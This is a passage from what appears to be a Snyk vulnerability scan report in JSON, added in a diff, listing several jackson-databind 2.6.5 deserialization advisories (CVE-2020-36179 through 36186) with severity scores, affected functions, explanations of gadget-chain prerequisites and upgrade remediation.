If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
